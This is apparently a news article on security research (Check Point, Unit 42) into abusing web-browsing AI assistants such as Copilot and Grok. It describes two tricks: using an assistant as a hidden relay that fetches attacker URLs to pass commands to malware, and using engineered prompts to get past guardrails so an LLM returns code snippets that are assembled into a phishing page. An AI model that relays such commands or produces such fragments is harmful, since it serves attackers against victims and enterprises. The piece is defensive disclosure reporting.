- Major AI platforms like Microsoft Copilot and xAI Grok can be exploited as stealthy command-and-control proxies.
- The technique, AI as a C2 proxy, uses web-browsing features for bidirectional attacker communication without needing API keys.
- This marks a significant evolution where AI can generate attack code dynamically and evade detection by blending into legitimate traffic.
- Attackers must first compromise a target, then use the AI channel to relay commands and orchestrate the next stages of an attack.
Cybersecurity researchers disclosed in late February 2026 that popular AI assistants with web access can be weaponized into covert attack channels, a finding detailed by Check Point. This technique transforms tools from Microsoft and xAI into hidden communication relays that perfectly mimic legitimate enterprise traffic.
Consequently, this method bypasses traditional security measures because it doesn’t require an API key or registered account. According to Check Point researchers, anonymous web access combined with browsing and summarization prompts enables the exploit, which they call AI as a C2 proxy.
The system essentially leverages the AI’s URL-fetching capability to contact attacker-controlled infrastructure. It then returns a response containing the next command for malware already installed on a victim’s machine.
This development signals a critical shift in how threat actors can abuse AI, as noted by cybersecurity firms. AI already acts as a force multiplier for adversaries in various attack phases.
However, the new technique goes further by automating operational decisions in real time. “The same interface can also carry prompts and model outputs that act as an external decision engine”, Check Point said regarding the potential for fully AI-driven implants.
The disclosure follows a similar recent finding where AI was used to generate malicious code dynamically in a victim’s browser. That method, detailed by Palo Alto Networks Unit 42 researchers, can assemble a phishing page in real-time by smuggling code via client-side AI API calls.
Unit 42 experts warned that carefully engineered prompts can bypass AI safety guardrails. “These snippets are returned via the LLM service API, then assembled and executed in the victim’s browser at runtime”, they said, resulting in a functional phishing page.
✅ Follow BITNEWSBOT on Telegram, Facebook, LinkedIn, X.com, and Google News for instant updates.
Previous Articles:
- Tesla’s AI Shift, Not Cars, to Drive Growth: Analysts
- BitMine Buys 45,759 ETH as Bullish Tom Lee Eyes 2026
- Anonymous Whale Nets $7M Shorting Crypto Crash
- Ethereum user loses $600K to address poisoning scam
- Fake Oura Health MCP Server Delivers StealC Infostealer
